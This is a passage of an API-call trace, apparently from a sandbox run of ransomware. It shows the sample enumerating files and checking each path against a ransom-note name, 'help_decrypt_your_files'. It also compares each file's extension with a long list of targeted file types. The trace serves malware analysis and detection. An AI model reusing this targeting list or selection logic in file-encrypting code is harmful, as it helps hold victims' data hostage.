e.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".ico") returned 0x0
	[0167.848] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2136a4c1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2136a4c1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2136a4c1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xebb8, dwReserved0=0x0, dwReserved1=0x0, cFileName="print_property.ico", cAlternateFileName="")) returned 1
	[0167.849] lstrcmpW (lpString1="print_property.ico", lpString2="..") returned 1
	[0167.849] lstrcmpW (lpString1="print_property.ico", lpString2=".") returned 1
	[0167.849] lstrcpyW (in: lpString1=0x18a3d4, lpString2="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\") returned="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\"
	[0167.849] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\", lpString2="print_property.ico" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_property.ico") returned="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_property.ico"
	[0167.849] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_property.ico") returned 104
	[0167.849] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0167.849] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_property.ico", cchLength=0x68 | out: lpsz="c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_property.ico") returned 0x68
	[0167.849] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.849] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_property.ico", lpSrch="help_decrypt_your_files") returned 0x0
	[0167.850] lstrcpyW (in: lpString1=0x189f7c, lpString2="c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_property.ico" | out: lpString1="c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_property.ico") returned="c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_property.ico"
	[0167.850] lstrlenW (lpString="c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_property.ico") returned 104
	[0167.850] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0167.850] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.850] StrStrW (lpFirst=".ico", lpSrch=".") returned=".ico"
	[0167.850] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.850] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".ico") returned 0x0
	[0167.851] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2136a4c1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2136a4c1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2136a4c1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xdff5, dwReserved0=0x0, dwReserved1=0x0, cFileName="print_queue.ico", cAlternateFileName="")) returned 1
	[0167.851] lstrcmpW (lpString1="print_queue.ico", lpString2="..") returned 1
	[0167.851] lstrcmpW (lpString1="print_queue.ico", lpString2=".") returned 1
	[0167.851] lstrcpyW (in: lpString1=0x18a3d4, lpString2="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\") returned="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\"
	[0167.851] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\", lpString2="print_queue.ico" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_queue.ico") returned="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_queue.ico"
	[0167.851] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_queue.ico") returned 101
	[0167.851] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0167.851] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_queue.ico", cchLength=0x65 | out: lpsz="c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_queue.ico") returned 0x65
	[0167.851] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.852] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_queue.ico", lpSrch="help_decrypt_your_files") returned 0x0
	[0167.852] lstrcpyW (in: lpString1=0x189f7c, lpString2="c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_queue.ico" | out: lpString1="c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_queue.ico") returned="c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_queue.ico"
	[0167.852] lstrlenW (lpString="c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_queue.ico") returned 101
	[0167.852] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0167.852] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.852] StrStrW (lpFirst=".ico", lpSrch=".") returned=".ico"
	[0167.852] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.852] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".ico") returned 0x0
	[0167.853] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2136a4c1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2136a4c1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2136a4c1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xec75, dwReserved0=0x0, dwReserved1=0x0, cFileName="scan_.ico", cAlternateFileName="")) returned 1
	[0167.853] lstrcmpW (lpString1="scan_.ico", lpString2="..") returned 1
	[0167.853] lstrcmpW (lpString1="scan_.ico", lpString2=".") returned 1
	[0167.853] lstrcpyW (in: lpString1=0x18a3d4, lpString2="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\") returned="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\"
	[0167.853] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\", lpString2="scan_.ico" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_.ico") returned="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_.ico"
	[0167.853] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_.ico") returned 95
	[0167.853] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
